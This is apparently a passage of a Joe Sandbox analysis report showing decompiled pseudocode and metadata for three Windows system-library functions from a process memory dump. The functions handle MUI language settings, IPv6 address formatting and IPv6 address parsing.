                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009C8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E009C8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E009C8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E009AE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E009C718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E009C8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E009C718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E009C8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E009C8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E009C8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E009C718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E009A2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E009BE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E009AE2A8(_t322,  &_v68, _v16);
								if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E009BE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E009AE2A8(_t322,  &_v68, _t236);
								if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E009C718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E009A2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E009BE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E009AE2A8(_v12,  &_v68, _v16);
							if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E009BE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E009AE2A8(_t322,  &_v68, _t269);
							if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E009C718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E009A2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E009BE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E009AE2A8(_v12,  &_v68, _v16);
						if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E009BE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E009AE2A8(_t322,  &_v68, _t296);
						if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                          0x009c8788
                                          0x009c8788
                                          0x009c8791
                                          0x009c8794
                                          0x009c8798
                                          0x009c879b
                                          0x009c879e
                                          0x009c87a1
                                          0x009c87a4
                                          0x009c87a7
                                          0x009c87aa
                                          0x009c87af
                                          0x00a11ad3
                                          0x009c8b0a
                                          0x009c8b0d
                                          0x009c8b13
                                          0x009c8b19
                                          0x009c8b1f
                                          0x009c8b25
                                          0x009c8b2b
                                          0x009c8b31
                                          0x009c8b37
                                          0x009c8b3d
                                          0x009c8b46
                                          0x009c8b46
                                          0x009c87c6
                                          0x009c87d0
                                          0x00a11ae0
                                          0x00a11ae6
                                          0x00a11af8
                                          0x00a11af8
                                          0x00a11afd
                                          0x00a11afe
                                          0x00a11b01
                                          0x00a11b06
                                          0x00a11b06
                                          0x009c87d6
                                          0x009c87f2
                                          0x009c87f7
                                          0x009c8807
                                          0x009c880a
                                          0x009c880f
                                          0x009c8810
                                          0x009c8813
                                          0x009c8818
                                          0x009c8818
                                          0x009c882c
                                          0x009c8831
                                          0x009c8838
                                          0x009c8908
                                          0x009c8920
                                          0x009c89f0
                                          0x009c8a08
                                          0x009c8af6
                                          0x009c8af6
                                          0x009c8af8
                                          0x009c8afb
                                          0x00a11beb
                                          0x00a11beb
                                          0x009c8b04
                                          0x00a11bf8
                                          0x00a11c0e
                                          0x00a11c13
                                          0x00a11c16
                                          0x00a11c16
                                          0x00a11bf8
                                          0x00000000
                                          0x009c8b04
                                          0x009c8a0e
                                          0x009c8a11
                                          0x009c8a14
                                          0x009c8a15
                                          0x009c8a18
                                          0x009c8a22
                                          0x009c8b59
                                          0x009c8a28
                                          0x009c8a3c
                                          0x009c8a3c
                                          0x009c8a42
                                          0x00a11bb0
                                          0x00a11b11
                                          0x00a11b11
                                          0x00000000
                                          0x009c8a48
                                          0x009c8a51
                                          0x009c8a5b
                                          0x009c8a5e
                                          0x009c8a61
                                          0x009c8a69
                                          0x009c8a69
                                          0x009c8a6d
                                          0x00000000
                                          0x00000000
                                          0x009c8a74
                                          0x009c8a7c
                                          0x009c8a7d
                                          0x009c8a91
                                          0x009c8a93
                                          0x009c8a93
                                          0x009c8a98
                                          0x009c8a9b
                                          0x009c8aa1
                                          0x009c8aa1
                                          0x009c8aa4
                                          0x009c8aaa
                                          0x009c8ab1
                                          0x009c8ac5
                                          0x009c8ac7
                                          0x009c8ac7
                                          0x009c8ac5
                                          0x009c8ace
                                          0x00a11bc9
                                          0x00a11bce
                                          0x00a11bd2
                                          0x00a11bd2
                                          0x009c8ad8
                                          0x009c8aeb
                                          0x009c8aeb
                                          0x009c8af0
                                          0x009c8af4
                                          0x00000000
                                          0x009c8af4
                                          0x009c8a42
                                          0x009c8926
                                          0x009c8929
                                          0x009c892c
                                          0x009c892d
                                          0x009c8930
                                          0x009c8935
                                          0x009c893a
                                          0x009c8b51
                                          0x009c8940
                                          0x009c8954
                                          0x009c8954
                                          0x009c895a
                                          0x00a11b63
                                          0x00000000
                                          0x009c8960
                                          0x009c8969
                                          0x009c8973
                                          0x009c8976
                                          0x009c8979
                                          0x009c897e
                                          0x009c8981
                                          0x009c8981
                                          0x009c8986
                                          0x00000000
                                          0x00000000
                                          0x00a11b6e
                                          0x00a11b74
                                          0x00a11b7b
                                          0x00a11b8f
                                          0x00a11b91
                                          0x00a11b91
                                          0x00a11b99
                                          0x00a11b9c
                                          0x00a11ba2
                                          0x00a11ba2
                                          0x009c898c
                                          0x009c8992
                                          0x009c8999
                                          0x009c89ad
                                          0x00a11ba8
                                          0x00a11ba8
                                          0x009c89ad
                                          0x009c89b6
                                          0x009c89c8
                                          0x009c89cd
                                          0x009c89d0
                                          0x009c89d0
                                          0x009c89d6
                                          0x009c89e8
                                          0x009c89e8
                                          0x009c89ed
                                          0x00000000
                                          0x009c89ed
                                          0x009c895a
                                          0x009c883e
                                          0x009c8841
                                          0x009c8844
                                          0x009c8845
                                          0x009c8848
                                          0x009c884d
                                          0x009c8852
                                          0x009c8b49
                                          0x009c8858
                                          0x009c886c
                                          0x009c886c
                                          0x009c8872
                                          0x00a11b0e
                                          0x00000000
                                          0x009c8878
                                          0x009c8881
                                          0x009c888b
                                          0x009c888e
                                          0x009c8891
                                          0x009c8896
                                          0x009c8899
                                          0x009c8899
                                          0x009c889e
                                          0x00000000
                                          0x00000000
                                          0x00a11b21
                                          0x00a11b27
                                          0x00a11b2e
                                          0x00a11b42
                                          0x00a11b44
                                          0x00a11b44
                                          0x00a11b4c
                                          0x00a11b4f
                                          0x00a11b55
                                          0x00a11b55
                                          0x009c88a4
                                          0x009c88aa
                                          0x009c88b1
                                          0x009c88c5
                                          0x00a11b5b
                                          0x00a11b5b
                                          0x009c88c5
                                          0x009c88ce
                                          0x009c88e0
                                          0x009c88e5
                                          0x009c88e8
                                          0x009c88e8
                                          0x009c88ee
                                          0x009c8900
                                          0x009c8900
                                          0x009c8905
                                          0x00000000
                                          0x009c8905

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 009C89FC
                                          • WindowsExcludedProcs, xrefs: 009C87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 009C8914
                                          • Kernel-MUI-Number-Allowed, xrefs: 009C87E6
                                          • Kernel-MUI-Language-Allowed, xrefs: 009C8827
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 706fd3ad53eb3a4508093506800d61a8c1b84a5aa439fb5caeda8e8e76b7f0dc
                                          • Instruction ID: 65436cbde044b0565dac12a08dacd56a8b444a715543db40564c185c3775db4e
                                          • Opcode Fuzzy Hash: 706fd3ad53eb3a4508093506800d61a8c1b84a5aa439fb5caeda8e8e76b7f0dc
                                          • Instruction Fuzzy Hash: 63F1F7B2D04209EFCF51EF95C981EEEB7B8FF48300F15446AE605A7211EB349A45DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009E13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E009E13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E009D7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x9a2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E009D7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x9a9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E009D7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E009D7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E009D7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E009D7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                          0x009e13d5
                                          0x009e13d9
                                          0x009e13dc
                                          0x009e13de
                                          0x009e13e1
                                          0x009e13e8
                                          0x009e13ee
                                          0x00a0e8fd
                                          0x00000000
                                          0x00a0e921
                                          0x00a0e921
                                          0x00a0e928
                                          0x00a0e982
                                          0x00a0e98a
                                          0x00000000
                                          0x00a0e99a
                                          0x00a0e99e
                                          0x00a0e9a3
                                          0x00a0e9a8
                                          0x00a0e9b9
                                          0x00a0e978
                                          0x00000000
                                          0x00a0e978
                                          0x00a0e98a
                                          0x00a0e92a
                                          0x00a0e931
                                          0x00a0e944
                                          0x00a0e944
                                          0x00a0e950
                                          0x00a0e954
                                          0x00a0e959
                                          0x00a0e95e
                                          0x00a0e963
                                          0x00a0e970
                                          0x00000000
                                          0x00a0e975
                                          0x00a0e93b
                                          0x00a0e980
                                          0x00000000
                                          0x00a0e980
                                          0x00a0e942
                                          0x00a0e94b
                                          0x00000000
                                          0x00a0e94b
                                          0x00000000
                                          0x00a0e942
                                          0x009e13f4
                                          0x009e13f4
                                          0x009e13f9
                                          0x009e13fc
                                          0x009e13ff
                                          0x009e1406
                                          0x00a0e9cc
                                          0x00a0e9d2
                                          0x00a0e9d2
                                          0x00a0e9cc
                                          0x009e140c
                                          0x009e1411
                                          0x009e1431
                                          0x009e143a
                                          0x009e143c
                                          0x009e143f
                                          0x009e143f
                                          0x009e1442
                                          0x009e1447
                                          0x009e14a8
                                          0x009e14ac
                                          0x00a0e9e2
                                          0x00a0e9e7
                                          0x00a0e9ec
                                          0x00a0ea05
                                          0x00a0ea05
                                          0x00000000
                                          0x009e1449
                                          0x00000000
                                          0x009e1449
                                          0x009e144c
                                          0x009e1459
                                          0x009e1462
                                          0x009e1469
                                          0x009e146a
                                          0x009e1470
                                          0x009e1473
                                          0x009e1476
                                          0x009e1476
                                          0x009e1490
                                          0x009e1495
                                          0x009e138e
                                          0x009e1390
                                          0x009e1397
                                          0x009e1398
                                          0x009e1399
                                          0x009e13a1
                                          0x009e13a4
                                          0x009e13a4
                                          0x009e1498
                                          0x009e149c
                                          0x009e149f
                                          0x009e14a2
                                          0x00000000
                                          0x00000000
                                          0x009e14a4
                                          0x00000000
                                          0x009e14a4
                                          0x009e1413
                                          0x009e1415
                                          0x009e1416
                                          0x009e1419
                                          0x009e141c
                                          0x009e1422
                                          0x009e13b7
                                          0x009e13bc
                                          0x009e13bf
                                          0x009e13bf
                                          0x009e13c2
                                          0x009e1424
                                          0x009e1424
                                          0x009e1424
                                          0x009e1427
                                          0x009e142b
                                          0x009e142c
                                          0x009e142c
                                          0x009e142c
                                          0x00000000
                                          0x009e141c
                                          0x009e1411

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 0d432d3b7fb4a386975ecf8e7adec361be706cc47ec2a1319347e4242117fb2a
                                          • Instruction ID: bb9c42c630166003fd9e98af13f6af8369a6fa2802d3cce3f7a170ab226f72ff
                                          • Opcode Fuzzy Hash: 0d432d3b7fb4a386975ecf8e7adec361be706cc47ec2a1319347e4242117fb2a
                                          • Instruction Fuzzy Hash: 5361F871904695A6CF35DF9AC8808BEBBB9FFD5300754C52EF4D647681E234AE40DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009E0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E009E0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E009B8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L009ADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = L009E0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = L009E0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009E06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009E06BA(_t135, _t178) == 0 || E009E0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = L009E0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = L009E0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009E06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009E06BA(_t124, _t142) == 0 || E009E0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                          0x009e0b21
                                          0x009e0b24
                                          0x009e0b27
                                          0x009e0b2a
                                          0x009e0b2d
                                          0x009e0b30
                                          0x009e0b33
                                          0x009e0b36
                                          0x009e0b39
                                          0x009e0b3e
                                          0x009e0c65
                                          0x009e0c68
                                          0x009e0c6a
                                          0x009e0c6f
                                          0x00a0eb42
                                          0x00000000
                                          0x00000000
                                          0x00a0eb48
                                          0x00a0eb48
                                          0x009e0c75
                                          0x009e0c7a
                                          0x00a0eb54
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a0eb5a
                                          0x009e0c80
                                          0x009e0c84
                                          0x00a0eb98
                                          0x00000000
                                          0x00000000
                                          0x00a0eba6
                                          0x009e0cb8
                                          0x009e0cba
